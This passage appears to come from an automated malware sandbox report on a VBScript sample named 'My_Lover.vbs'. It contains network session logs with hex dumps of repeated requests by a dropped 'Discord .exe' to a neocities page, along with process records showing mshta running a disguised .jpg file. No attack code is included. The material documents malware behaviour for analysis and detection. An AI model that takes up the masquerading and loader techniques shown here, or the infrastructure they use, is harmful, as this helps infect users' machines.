event=&redir_token=QUFFLUhqbm9xWW84NXlwekxYVzJWNEczYmI0VkpTcWhRQXxBQ3Jtc0tucG5OQnMxVWJUX2RLaXpxUjFxalA2VWRJaU5pN0ttZnhVWjNZSUZnQlI2UXM0cWh5eFVCem9XVUFnZ2dtTUNWaDJOeERwQVpLczhKRm9CTVoyc2tMbk1RR0xFNWczOWhHNmthWFFKbWEwT21LMmp6VQ&q=https%3A%2F%2Fouo.io%2FWdr2

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.7	49736	198.51.233.2	443	C:\Users\user\Service\Discord .exe

Timestamp	kBytes transferred	Direction	Data
2022-11-04 18:59:47 UTC	188	OUT	GET / HTTP/1.1 Host: c1-wi.neocities.org Connection: close
2022-11-04 18:59:47 UTC	188	IN	HTTP/1.1 200 OK Date: Fri, 04 Nov 2022 18:59:47 GMT Content-Type: text/html Content-Length: 38000 Connection: close Vary: Accept-Encoding Last-Modified: Fri, 04 Nov 2022 18:41:15 GMT ETag: "63655ccb-9470" Server: neocities X-Ipfs-Path: /ipns/c1-wi.neocities.org Strict-Transport-Security: max-age=63072000; includeSubDomains; preload Content-Security-Policy: upgrade-insecure-requests; default-src 'unsafe-inline' 'unsafe-eval' 'self' data: blob: * X-Neocities-CDN: cdn-fra Upgrade-Insecure-Requests: 1 X-Cached: HIT Accept-Ranges: bytes
2022-11-04 18:59:47 UTC	189	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 20 0d 0a 31 35 30 0d 0a 32 34 30 0d 0a 59 6f 75 54 75 62 65 0d 0a 32 32 32 32 32 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 32 32 32 32 32 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 31 30 0d 0a 4c 69 6e 6b 76 65 72 74 69 73 65 0d 0a 31 31 31 31 31 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 31 31 31 31 31 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 31 30 0d 0a 6f 75 6f 2e 69 6f 0d 0a 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 Data Ascii: <html><head><title> 150240YouTube2222220000000000000000000111152222220000000000000000000111150010Linkvertise1111110000000000000000000111151111110000000000000000000111150010ouo.io000000000000000000000000011115000000000000000000000000011
2022-11-04 18:59:47 UTC	204	IN	Data Raw: 65 0d 0a 36 4c 63 45 72 5f 55 55 41 41 41 41 41 48 58 74 35 77 78 2d 6b 39 50 5f 6d 38 5a 31 4a 59 2d 43 6b 39 4d 78 72 68 78 6f 0d 0a 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 2e 63 6c 69 65 6e 74 73 5b 27 30 27 5d 5b 27 57 27 5d 5b 27 57 27 5d 5b 27 63 61 6c 6c 62 61 63 6b 27 5d 0d 0a 73 65 72 76 65 72 2d 35 0d 0a 32 30 0d 0a 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 6f 75 74 75 62 65 2e 63 6f 6d 2f 72 65 64 69 72 65 63 74 3f 65 76 65 6e 74 3d 26 72 65 64 69 72 5f 74 6f 6b 65 6e 3d 51 55 46 46 4c 55 68 71 62 56 4a 54 52 6d 4e 42 56 46 4a 59 4f 46 4a 5a 4e 58 51 79 51 54 68 6e 51 7a 42 79 57 48 41 77 52 56 46 50 51 58 78 42 51 33 4a 74 63 30 74 75 64 58 46 42 54 56 39 4a 56 30 31 50 62 6c 6c 55 4d 6d 39 4c 4f 55 39 52 51 6c 6c 4a 61 47 5a 49 64 6d Data Ascii: e6LcEr_UUAAAAAHXt5wx-k9P_m8Z1JY-Ck9Mxrhxo___grecaptcha_cfg.clients['0']['W']['W']['callback']server-520https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqbVJTRmNBVFJYOFJZNXQyQThnQzByWHAwRVFPQXxBQ3Jtc0tudXFBTV9JV01PbllUMm9LOU9RQllJaGZIdm
2022-11-04 18:59:47 UTC	220	IN	Data Raw: 65 76 65 6e 74 3d 26 72 65 64 69 72 5f 74 6f 6b 65 6e 3d 51 55 46 46 4c 55 68 71 62 6d 39 78 57 57 38 34 4e 58 6c 77 65 6b 78 59 56 7a 4a 57 4e 45 63 7a 59 6d 49 30 56 6b 70 54 63 57 68 52 51 58 78 42 51 33 4a 74 63 30 74 75 63 47 35 4f 51 6e 4d 78 56 57 4a 55 58 32 52 4c 61 58 70 78 55 6a 46 78 61 6c 41 32 56 57 52 4a 61 55 35 70 4e 30 74 74 5a 6e 68 56 57 6a 4e 5a 53 55 5a 6e 51 6c 49 32 55 58 4d 30 63 57 68 35 65 46 56 43 65 6d 39 58 56 55 46 6e 5a 32 64 74 54 55 4e 57 61 44 4a 4f 65 45 52 77 51 56 70 4c 63 7a 68 4b 52 6d 39 43 54 56 6f 79 63 32 74 4d 62 6b 31 52 52 30 78 46 4e 57 63 7a 4f 57 68 48 4e 6d 74 68 57 46 46 4b 62 57 45 77 54 32 31 4c 4d 6d 70 36 56 51 26 71 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 6f 75 6f 2e 69 6f 25 32 46 57 64 72 32 Data Ascii: event=&redir_token=QUFFLUhqbm9xWW84NXlwekxYVzJWNEczYmI0VkpTcWhRQXxBQ3Jtc0tucG5OQnMxVWJUX2RLaXpxUjFxalA2VWRJaU5pN0ttZnhVWjNZSUZnQlI2UXM0cWh5eFVCem9XVUFnZ2dtTUNWaDJOeERwQVpLczhKRm9CTVoyc2tMbk1RR0xFNWczOWhHNmthWFFKbWEwT21LMmp6VQ&q=https%3A%2F%2Fouo.io%2FWdr2

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.7	49737	198.51.233.2	443	C:\Users\user\Service\Discord .exe

Timestamp	kBytes transferred	Direction	Data
2022-11-04 18:59:48 UTC	226	OUT	GET / HTTP/1.1 Host: c1-wi.neocities.org Connection: close
2022-11-04 18:59:48 UTC	226	IN	HTTP/1.1 200 OK Date: Fri, 04 Nov 2022 18:59:48 GMT Content-Type: text/html Content-Length: 38000 Connection: close Vary: Accept-Encoding Last-Modified: Fri, 04 Nov 2022 18:41:15 GMT ETag: "63655ccb-9470" Server: neocities X-Ipfs-Path: /ipns/c1-wi.neocities.org Strict-Transport-Security: max-age=63072000; includeSubDomains; preload Content-Security-Policy: upgrade-insecure-requests; default-src 'unsafe-inline' 'unsafe-eval' 'self' data: blob: * X-Neocities-CDN: cdn-fra Upgrade-Insecure-Requests: 1 X-Cached: HIT Accept-Ranges: bytes
2022-11-04 18:59:48 UTC	226	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 20 0d 0a 31 35 30 0d 0a 32 34 30 0d 0a 59 6f 75 54 75 62 65 0d 0a 32 32 32 32 32 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 32 32 32 32 32 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 31 30 0d 0a 4c 69 6e 6b 76 65 72 74 69 73 65 0d 0a 31 31 31 31 31 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 31 31 31 31 31 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 31 30 0d 0a 6f 75 6f 2e 69 6f 0d 0a 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 Data Ascii: <html><head><title> 150240YouTube2222220000000000000000000111152222220000000000000000000111150010Linkvertise1111110000000000000000000111151111110000000000000000000111150010ouo.io000000000000000000000000011115000000000000000000000000011
2022-11-04 18:59:48 UTC	242	IN	Data Raw: 65 0d 0a 36 4c 63 45 72 5f 55 55 41 41 41 41 41 48 58 74 35 77 78 2d 6b 39 50 5f 6d 38 5a 31 4a 59 2d 43 6b 39 4d 78 72 68 78 6f 0d 0a 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 2e 63 6c 69 65 6e 74 73 5b 27 30 27 5d 5b 27 57 27 5d 5b 27 57 27 5d 5b 27 63 61 6c 6c 62 61 63 6b 27 5d 0d 0a 73 65 72 76 65 72 2d 35 0d 0a 32 30 0d 0a 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 6f 75 74 75 62 65 2e 63 6f 6d 2f 72 65 64 69 72 65 63 74 3f 65 76 65 6e 74 3d 26 72 65 64 69 72 5f 74 6f 6b 65 6e 3d 51 55 46 46 4c 55 68 71 62 56 4a 54 52 6d 4e 42 56 46 4a 59 4f 46 4a 5a 4e 58 51 79 51 54 68 6e 51 7a 42 79 57 48 41 77 52 56 46 50 51 58 78 42 51 33 4a 74 63 30 74 75 64 58 46 42 54 56 39 4a 56 30 31 50 62 6c 6c 55 4d 6d 39 4c 4f 55 39 52 51 6c 6c 4a 61 47 5a 49 64 6d Data Ascii: e6LcEr_UUAAAAAHXt5wx-k9P_m8Z1JY-Ck9Mxrhxo___grecaptcha_cfg.clients['0']['W']['W']['callback']server-520https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqbVJTRmNBVFJYOFJZNXQyQThnQzByWHAwRVFPQXxBQ3Jtc0tudXFBTV9JV01PbllUMm9LOU9RQllJaGZIdm
2022-11-04 18:59:48 UTC	258	IN	Data Raw: 65 76 65 6e 74 3d 26 72 65 64 69 72 5f 74 6f 6b 65 6e 3d 51 55 46 46 4c 55 68 71 62 6d 39 78 57 57 38 34 4e 58 6c 77 65 6b 78 59 56 7a 4a 57 4e 45 63 7a 59 6d 49 30 56 6b 70 54 63 57 68 52 51 58 78 42 51 33 4a 74 63 30 74 75 63 47 35 4f 51 6e 4d 78 56 57 4a 55 58 32 52 4c 61 58 70 78 55 6a 46 78 61 6c 41 32 56 57 52 4a 61 55 35 70 4e 30 74 74 5a 6e 68 56 57 6a 4e 5a 53 55 5a 6e 51 6c 49 32 55 58 4d 30 63 57 68 35 65 46 56 43 65 6d 39 58 56 55 46 6e 5a 32 64 74 54 55 4e 57 61 44 4a 4f 65 45 52 77 51 56 70 4c 63 7a 68 4b 52 6d 39 43 54 56 6f 79 63 32 74 4d 62 6b 31 52 52 30 78 46 4e 57 63 7a 4f 57 68 48 4e 6d 74 68 57 46 46 4b 62 57 45 77 54 32 31 4c 4d 6d 70 36 56 51 26 71 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 6f 75 6f 2e 69 6f 25 32 46 57 64 72 32 Data Ascii: event=&redir_token=QUFFLUhqbm9xWW84NXlwekxYVzJWNEczYmI0VkpTcWhRQXxBQ3Jtc0tucG5OQnMxVWJUX2RLaXpxUjFxalA2VWRJaU5pN0ttZnhVWjNZSUZnQlI2UXM0cWh5eFVCem9XVUFnZ2dtTUNWaDJOeERwQVpLczhKRm9CTVoyc2tMbk1RR0xFNWczOWhHNmthWFFKbWEwT21LMmp6VQ&q=https%3A%2F%2Fouo.io%2FWdr2

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.7	49738	198.51.233.2	443	C:\Users\user\Service\Discord .exe

Timestamp	kBytes transferred	Direction	Data
2022-11-04 18:59:48 UTC	264	OUT	GET / HTTP/1.1 Host: c1-wi.neocities.org Connection: close
2022-11-04 18:59:48 UTC	264	IN	HTTP/1.1 200 OK Date: Fri, 04 Nov 2022 18:59:48 GMT Content-Type: text/html Content-Length: 38000 Connection: close Vary: Accept-Encoding Last-Modified: Fri, 04 Nov 2022 18:41:15 GMT ETag: "63655ccb-9470" Server: neocities X-Ipfs-Path: /ipns/c1-wi.neocities.org Strict-Transport-Security: max-age=63072000; includeSubDomains; preload Content-Security-Policy: upgrade-insecure-requests; default-src 'unsafe-inline' 'unsafe-eval' 'self' data: blob: * X-Neocities-CDN: cdn-fra Upgrade-Insecure-Requests: 1 X-Cached: HIT Accept-Ranges: bytes
2022-11-04 18:59:48 UTC	264	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 20 0d 0a 31 35 30 0d 0a 32 34 30 0d 0a 59 6f 75 54 75 62 65 0d 0a 32 32 32 32 32 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 32 32 32 32 32 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 31 30 0d 0a 4c 69 6e 6b 76 65 72 74 69 73 65 0d 0a 31 31 31 31 31 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 31 31 31 31 31 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 31 30 0d 0a 6f 75 6f 2e 69 6f 0d 0a 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 Data Ascii: <html><head><title> 150240YouTube2222220000000000000000000111152222220000000000000000000111150010Linkvertise1111110000000000000000000111151111110000000000000000000111150010ouo.io000000000000000000000000011115000000000000000000000000011
2022-11-04 18:59:48 UTC	280	IN	Data Raw: 65 0d 0a 36 4c 63 45 72 5f 55 55 41 41 41 41 41 48 58 74 35 77 78 2d 6b 39 50 5f 6d 38 5a 31 4a 59 2d 43 6b 39 4d 78 72 68 78 6f 0d 0a 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 2e 63 6c 69 65 6e 74 73 5b 27 30 27 5d 5b 27 57 27 5d 5b 27 57 27 5d 5b 27 63 61 6c 6c 62 61 63 6b 27 5d 0d 0a 73 65 72 76 65 72 2d 35 0d 0a 32 30 0d 0a 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 6f 75 74 75 62 65 2e 63 6f 6d 2f 72 65 64 69 72 65 63 74 3f 65 76 65 6e 74 3d 26 72 65 64 69 72 5f 74 6f 6b 65 6e 3d 51 55 46 46 4c 55 68 71 62 56 4a 54 52 6d 4e 42 56 46 4a 59 4f 46 4a 5a 4e 58 51 79 51 54 68 6e 51 7a 42 79 57 48 41 77 52 56 46 50 51 58 78 42 51 33 4a 74 63 30 74 75 64 58 46 42 54 56 39 4a 56 30 31 50 62 6c 6c 55 4d 6d 39 4c 4f 55 39 52 51 6c 6c 4a 61 47 5a 49 64 6d Data Ascii: e6LcEr_UUAAAAAHXt5wx-k9P_m8Z1JY-Ck9Mxrhxo___grecaptcha_cfg.clients['0']['W']['W']['callback']server-520https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqbVJTRmNBVFJYOFJZNXQyQThnQzByWHAwRVFPQXxBQ3Jtc0tudXFBTV9JV01PbllUMm9LOU9RQllJaGZIdm
2022-11-04 18:59:48 UTC	296	IN	Data Raw: 65 76 65 6e 74 3d 26 72 65 64 69 72 5f 74 6f 6b 65 6e 3d 51 55 46 46 4c 55 68 71 62 6d 39 78 57 57 38 34 4e 58 6c 77 65 6b 78 59 56 7a 4a 57 4e 45 63 7a 59 6d 49 30 56 6b 70 54 63 57 68 52 51 58 78 42 51 33 4a 74 63 30 74 75 63 47 35 4f 51 6e 4d 78 56 57 4a 55 58 32 52 4c 61 58 70 78 55 6a 46 78 61 6c 41 32 56 57 52 4a 61 55 35 70 4e 30 74 74 5a 6e 68 56 57 6a 4e 5a 53 55 5a 6e 51 6c 49 32 55 58 4d 30 63 57 68 35 65 46 56 43 65 6d 39 58 56 55 46 6e 5a 32 64 74 54 55 4e 57 61 44 4a 4f 65 45 52 77 51 56 70 4c 63 7a 68 4b 52 6d 39 43 54 56 6f 79 63 32 74 4d 62 6b 31 52 52 30 78 46 4e 57 63 7a 4f 57 68 48 4e 6d 74 68 57 46 46 4b 62 57 45 77 54 32 31 4c 4d 6d 70 36 56 51 26 71 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 6f 75 6f 2e 69 6f 25 32 46 57 64 72 32 Data Ascii: event=&redir_token=QUFFLUhqbm9xWW84NXlwekxYVzJWNEczYmI0VkpTcWhRQXxBQ3Jtc0tucG5OQnMxVWJUX2RLaXpxUjFxalA2VWRJaU5pN0ttZnhVWjNZSUZnQlI2UXM0cWh5eFVCem9XVUFnZ2dtTUNWaDJOeERwQVpLczhKRm9CTVoyc2tMbk1RR0xFNWczOWhHNmthWFFKbWEwT21LMmp6VQ&q=https%3A%2F%2Fouo.io%2FWdr2

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.7	49739	198.51.233.2	443	C:\Users\user\Service\Discord .exe

Timestamp	kBytes transferred	Direction	Data
2022-11-04 18:59:49 UTC	301	OUT	GET / HTTP/1.1 Host: c1-wi.neocities.org Connection: close
2022-11-04 18:59:49 UTC	301	IN	HTTP/1.1 200 OK Date: Fri, 04 Nov 2022 18:59:49 GMT Content-Type: text/html Content-Length: 38000 Connection: close Vary: Accept-Encoding Last-Modified: Fri, 04 Nov 2022 18:41:15 GMT ETag: "63655ccb-9470" Server: neocities X-Ipfs-Path: /ipns/c1-wi.neocities.org Strict-Transport-Security: max-age=63072000; includeSubDomains; preload Content-Security-Policy: upgrade-insecure-requests; default-src 'unsafe-inline' 'unsafe-eval' 'self' data: blob: * X-Neocities-CDN: cdn-fra Upgrade-Insecure-Requests: 1 X-Cached: HIT Accept-Ranges: bytes
2022-11-04 18:59:49 UTC	302	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 20 0d 0a 31 35 30 0d 0a 32 34 30 0d 0a 59 6f 75 54 75 62 65 0d 0a 32 32 32 32 32 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 32 32 32 32 32 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 31 30 0d 0a 4c 69 6e 6b 76 65 72 74 69 73 65 0d 0a 31 31 31 31 31 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 31 31 31 31 31 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 31 30 0d 0a 6f 75 6f 2e 69 6f 0d 0a 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 Data Ascii: <html><head><title> 150240YouTube2222220000000000000000000111152222220000000000000000000111150010Linkvertise1111110000000000000000000111151111110000000000000000000111150010ouo.io000000000000000000000000011115000000000000000000000000011
2022-11-04 18:59:49 UTC	317	IN	Data Raw: 65 0d 0a 36 4c 63 45 72 5f 55 55 41 41 41 41 41 48 58 74 35 77 78 2d 6b 39 50 5f 6d 38 5a 31 4a 59 2d 43 6b 39 4d 78 72 68 78 6f 0d 0a 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 2e 63 6c 69 65 6e 74 73 5b 27 30 27 5d 5b 27 57 27 5d 5b 27 57 27 5d 5b 27 63 61 6c 6c 62 61 63 6b 27 5d 0d 0a 73 65 72 76 65 72 2d 35 0d 0a 32 30 0d 0a 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 6f 75 74 75 62 65 2e 63 6f 6d 2f 72 65 64 69 72 65 63 74 3f 65 76 65 6e 74 3d 26 72 65 64 69 72 5f 74 6f 6b 65 6e 3d 51 55 46 46 4c 55 68 71 62 56 4a 54 52 6d 4e 42 56 46 4a 59 4f 46 4a 5a 4e 58 51 79 51 54 68 6e 51 7a 42 79 57 48 41 77 52 56 46 50 51 58 78 42 51 33 4a 74 63 30 74 75 64 58 46 42 54 56 39 4a 56 30 31 50 62 6c 6c 55 4d 6d 39 4c 4f 55 39 52 51 6c 6c 4a 61 47 5a 49 64 6d Data Ascii: e6LcEr_UUAAAAAHXt5wx-k9P_m8Z1JY-Ck9Mxrhxo___grecaptcha_cfg.clients['0']['W']['W']['callback']server-520https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqbVJTRmNBVFJYOFJZNXQyQThnQzByWHAwRVFPQXxBQ3Jtc0tudXFBTV9JV01PbllUMm9LOU9RQllJaGZIdm
2022-11-04 18:59:49 UTC	333	IN	Data Raw: 65 76 65 6e 74 3d 26 72 65 64 69 72 5f 74 6f 6b 65 6e 3d 51 55 46 46 4c 55 68 71 62 6d 39 78 57 57 38 34 4e 58 6c 77 65 6b 78 59 56 7a 4a 57 4e 45 63 7a 59 6d 49 30 56 6b 70 54 63 57 68 52 51 58 78 42 51 33 4a 74 63 30 74 75 63 47 35 4f 51 6e 4d 78 56 57 4a 55 58 32 52 4c 61 58 70 78 55 6a 46 78 61 6c 41 32 56 57 52 4a 61 55 35 70 4e 30 74 74 5a 6e 68 56 57 6a 4e 5a 53 55 5a 6e 51 6c 49 32 55 58 4d 30 63 57 68 35 65 46 56 43 65 6d 39 58 56 55 46 6e 5a 32 64 74 54 55 4e 57 61 44 4a 4f 65 45 52 77 51 56 70 4c 63 7a 68 4b 52 6d 39 43 54 56 6f 79 63 32 74 4d 62 6b 31 52 52 30 78 46 4e 57 63 7a 4f 57 68 48 4e 6d 74 68 57 46 46 4b 62 57 45 77 54 32 31 4c 4d 6d 70 36 56 51 26 71 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 6f 75 6f 2e 69 6f 25 32 46 57 64 72 32 Data Ascii: event=&redir_token=QUFFLUhqbm9xWW84NXlwekxYVzJWNEczYmI0VkpTcWhRQXxBQ3Jtc0tucG5OQnMxVWJUX2RLaXpxUjFxalA2VWRJaU5pN0ttZnhVWjNZSUZnQlI2UXM0cWh5eFVCem9XVUFnZ2dtTUNWaDJOeERwQVpLczhKRm9CTVoyc2tMbk1RR0xFNWczOWhHNmthWFFKbWEwT21LMmp6VQ&q=https%3A%2F%2Fouo.io%2FWdr2

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.7	49740	198.51.233.2	443	C:\Users\user\Service\Discord .exe

Timestamp	kBytes transferred	Direction	Data
2022-11-04 18:59:49 UTC	339	OUT	GET / HTTP/1.1 Host: c1-wi.neocities.org Connection: close
2022-11-04 18:59:49 UTC	339	IN	HTTP/1.1 200 OK Date: Fri, 04 Nov 2022 18:59:49 GMT Content-Type: text/html Content-Length: 38000 Connection: close Vary: Accept-Encoding Last-Modified: Fri, 04 Nov 2022 18:41:15 GMT ETag: "63655ccb-9470" Server: neocities X-Ipfs-Path: /ipns/c1-wi.neocities.org Strict-Transport-Security: max-age=63072000; includeSubDomains; preload Content-Security-Policy: upgrade-insecure-requests; default-src 'unsafe-inline' 'unsafe-eval' 'self' data: blob: * X-Neocities-CDN: cdn-fra Upgrade-Insecure-Requests: 1 X-Cached: HIT Accept-Ranges: bytes
2022-11-04 18:59:49 UTC	340	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 20 0d 0a 31 35 30 0d 0a 32 34 30 0d 0a 59 6f 75 54 75 62 65 0d 0a 32 32 32 32 32 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 32 32 32 32 32 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 31 30 0d 0a 4c 69 6e 6b 76 65 72 74 69 73 65 0d 0a 31 31 31 31 31 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 31 31 31 31 31 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 31 30 0d 0a 6f 75 6f 2e 69 6f 0d 0a 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 Data Ascii: <html><head><title> 150240YouTube2222220000000000000000000111152222220000000000000000000111150010Linkvertise1111110000000000000000000111151111110000000000000000000111150010ouo.io000000000000000000000000011115000000000000000000000000011
2022-11-04 18:59:49 UTC	355	IN	Data Raw: 65 0d 0a 36 4c 63 45 72 5f 55 55 41 41 41 41 41 48 58 74 35 77 78 2d 6b 39 50 5f 6d 38 5a 31 4a 59 2d 43 6b 39 4d 78 72 68 78 6f 0d 0a 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 2e 63 6c 69 65 6e 74 73 5b 27 30 27 5d 5b 27 57 27 5d 5b 27 57 27 5d 5b 27 63 61 6c 6c 62 61 63 6b 27 5d 0d 0a 73 65 72 76 65 72 2d 35 0d 0a 32 30 0d 0a 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 6f 75 74 75 62 65 2e 63 6f 6d 2f 72 65 64 69 72 65 63 74 3f 65 76 65 6e 74 3d 26 72 65 64 69 72 5f 74 6f 6b 65 6e 3d 51 55 46 46 4c 55 68 71 62 56 4a 54 52 6d 4e 42 56 46 4a 59 4f 46 4a 5a 4e 58 51 79 51 54 68 6e 51 7a 42 79 57 48 41 77 52 56 46 50 51 58 78 42 51 33 4a 74 63 30 74 75 64 58 46 42 54 56 39 4a 56 30 31 50 62 6c 6c 55 4d 6d 39 4c 4f 55 39 52 51 6c 6c 4a 61 47 5a 49 64 6d Data Ascii: e6LcEr_UUAAAAAHXt5wx-k9P_m8Z1JY-Ck9Mxrhxo___grecaptcha_cfg.clients['0']['W']['W']['callback']server-520https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqbVJTRmNBVFJYOFJZNXQyQThnQzByWHAwRVFPQXxBQ3Jtc0tudXFBTV9JV01PbllUMm9LOU9RQllJaGZIdm
2022-11-04 18:59:49 UTC	371	IN	Data Raw: 65 76 65 6e 74 3d 26 72 65 64 69 72 5f 74 6f 6b 65 6e 3d 51 55 46 46 4c 55 68 71 62 6d 39 78 57 57 38 34 4e 58 6c 77 65 6b 78 59 56 7a 4a 57 4e 45 63 7a 59 6d 49 30 56 6b 70 54 63 57 68 52 51 58 78 42 51 33 4a 74 63 30 74 75 63 47 35 4f 51 6e 4d 78 56 57 4a 55 58 32 52 4c 61 58 70 78 55 6a 46 78 61 6c 41 32 56 57 52 4a 61 55 35 70 4e 30 74 74 5a 6e 68 56 57 6a 4e 5a 53 55 5a 6e 51 6c 49 32 55 58 4d 30 63 57 68 35 65 46 56 43 65 6d 39 58 56 55 46 6e 5a 32 64 74 54 55 4e 57 61 44 4a 4f 65 45 52 77 51 56 70 4c 63 7a 68 4b 52 6d 39 43 54 56 6f 79 63 32 74 4d 62 6b 31 52 52 30 78 46 4e 57 63 7a 4f 57 68 48 4e 6d 74 68 57 46 46 4b 62 57 45 77 54 32 31 4c 4d 6d 70 36 56 51 26 71 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 6f 75 6f 2e 69 6f 25 32 46 57 64 72 32 Data Ascii: event=&redir_token=QUFFLUhqbm9xWW84NXlwekxYVzJWNEczYmI0VkpTcWhRQXxBQ3Jtc0tucG5OQnMxVWJUX2RLaXpxUjFxalA2VWRJaU5pN0ttZnhVWjNZSUZnQlI2UXM0cWh5eFVCem9XVUFnZ2dtTUNWaDJOeERwQVpLczhKRm9CTVoyc2tMbk1RR0xFNWczOWhHNmthWFFKbWEwT21LMmp6VQ&q=https%3A%2F%2Fouo.io%2FWdr2

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: wscript.exePID: 4240, Parent PID: 3320

General

Target ID:	0
Start time:	19:55:59
Start date:	04/11/2022
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\My_Lover.vbs"
Imagebase:	0x7ff7bb7d0000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: mshta.exePID: 6124, Parent PID: 3764

General

Target ID:	10
Start time:	19:56:26
Start date:	04/11/2022
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	mshta.exe C:\Users\user~1\AppData\Local\Temp\8901m.jpg
Imagebase:	0x7ff6f9ec0000
File size:	14848 bytes
MD5 hash:	197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: Discord .exePID: 2788, Parent PID: 3320

General

Target ID:	14
Start time:	19:59:38
Start date:	04/11/2022
Path:	C:\Users\user\Service\Discord .exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Service\Discord .exe"
Imagebase:	0x400000
File size:	312080 bytes
MD5 hash:	2BC22E2E79238D57504BD3720C240533
Has elevated privileges:	false
Has administrator privileges:	false
